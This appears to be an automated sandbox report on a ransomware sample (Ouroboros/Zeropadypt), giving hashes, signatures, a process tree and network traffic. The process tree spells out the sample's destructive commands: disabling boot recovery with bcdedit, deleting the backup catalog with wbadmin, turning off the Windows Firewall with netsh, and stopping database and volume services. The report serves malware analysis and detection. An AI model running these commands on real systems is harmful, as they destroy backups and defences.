Analysis

  • max time kernel
    179s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-02-2022 00:24

General

  • Target

    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe

  • Size

    994KB

  • MD5

    043051032c01d2d5e7dc0a180eab52f0

  • SHA1

    6a708fc95a1b0d0f60b5674b652e27b52db2fbbd

  • SHA256

    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee

  • SHA512

    754d42a6600cfd11999b7e7a2cd771c62e42d8cd581a621cae764c245cc68af1b56c554704ea81cb0b17059bf94bf0a17798e14f26732840cb74a74a390b2537

Malware Config

Signatures

  • Ouroboros/Zeropadypt

    Ransomware family based on open-source CryptoWire.

  • Modifies Windows Firewall 1 TTPs
  • Drops desktop.ini file(s) 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    "C:\Users\Admin\AppData\Local\Temp\bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLWriter
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\SysWOW64\net.exe
        net stop SQLWriter
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4060
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLWriter
          4⤵
          PID:2216
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLBrowser
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\net.exe
        net stop SQLBrowser
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLBrowser
          4⤵
          PID:4216
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\net.exe
        net stop MSSQLSERVER
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4408
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQLSERVER
          4⤵
          PID:1420
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4404
      • C:\Windows\SysWOW64\net.exe
        net stop MSSQL$CONTOSO1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQL$CONTOSO1
          4⤵
          PID:3664
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSDTC
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\SysWOW64\net.exe
        net stop MSDTC
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3332
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSDTC
          4⤵
          PID:4380
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:4328
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
      2⤵
      PID:4592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
      2⤵
      PID:4568
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Windows\SysWOW64\net.exe
        net stop SQLSERVERAGENT
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2052
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLSERVERAGENT
          4⤵
          PID:3696
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
      2⤵
      PID:4712
      • C:\Windows\SysWOW64\net.exe
        net stop MSSQLSERVER
        3⤵
        PID:1872
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQLSERVER
          4⤵
          PID:4272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop vds
      2⤵
      PID:3260
      • C:\Windows\SysWOW64\net.exe
        net stop vds
        3⤵
        PID:1008
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop vds
          4⤵
          PID:2160
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
      2⤵
      PID:704
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        PID:1460
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
      2⤵
      PID:1304
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        PID:1216
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:4084
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:3112

Network

  • flag-us
    DNS
    www.sfml-dev.org
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    Remote address:
    8.8.8.8:53
    Request
    www.sfml-dev.org
    IN A
    Response
    www.sfml-dev.org
    IN CNAME
    sfml-dev.org
    sfml-dev.org
    IN A
    78.47.82.133
  • flag-de
    GET
    http://www.sfml-dev.org/ip-provider.php
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    Remote address:
    78.47.82.133:80
    Request
    GET /ip-provider.php HTTP/1.0
    content-length: 0
    from: user@sfml-dev.org
    host: www.sfml-dev.org
    user-agent: libsfml-network/2.x
    Response
    HTTP/1.1 200 OK
    Date: Sat, 12 Feb 2022 00:25:21 GMT
    Server: Apache
    Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' 'unsafe-inline' *.sfml-dev.org www.gstatic.com www.google.com www.google-analytics.com ssl.google-analytics.com; connect-src 'self' www.google-analytics.com; img-src 'self' https: data:; style-src 'self' 'unsafe-inline' *.sfml-dev.org fonts.googleapis.com; media-src https: data:; font-src 'self' fonts.gstatic.com; base-uri 'self'; form-action 'self'; frame-src https: data:
    Content-Length: 12
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • 93.184.220.29:80
    46 B
    40 B
    1
    1
  • 72.21.81.240:80
    322 B
    7
  • 72.21.81.240:80
    322 B
    7
  • 51.132.193.105:443
    40 B
    1
  • 78.47.82.133:80
    http://www.sfml-dev.org/ip-provider.php
    http
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    364 B
    829 B
    5
    5

    HTTP Request

    GET http://www.sfml-dev.org/ip-provider.php

    HTTP Response

    200
  • 172.98.203.175:80
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    260 B
    5
  • 172.98.203.178:80
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    260 B
    5
  • 10.127.1.168:8080
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
  • 8.8.8.8:53
    www.sfml-dev.org
    dns
    bb51eef3e46dc4ebf041dd7ac6e717d36eea57ca3acc88efad65fa3cb06081ee.exe
    62 B
    92 B
    1
    1

    DNS Request

    www.sfml-dev.org

    DNS Response

    78.47.82.133

MITRE ATT&CK Enterprise v6


Downloads

  • memory/4084-131-0x0000025816380000-0x0000025816390000-memory.dmp

    Filesize

    64KB

  • memory/4084-130-0x0000025816320000-0x0000025816330000-memory.dmp

    Filesize

    64KB

  • memory/4084-132-0x0000025818A60000-0x0000025818A64000-memory.dmp

    Filesize

    16KB
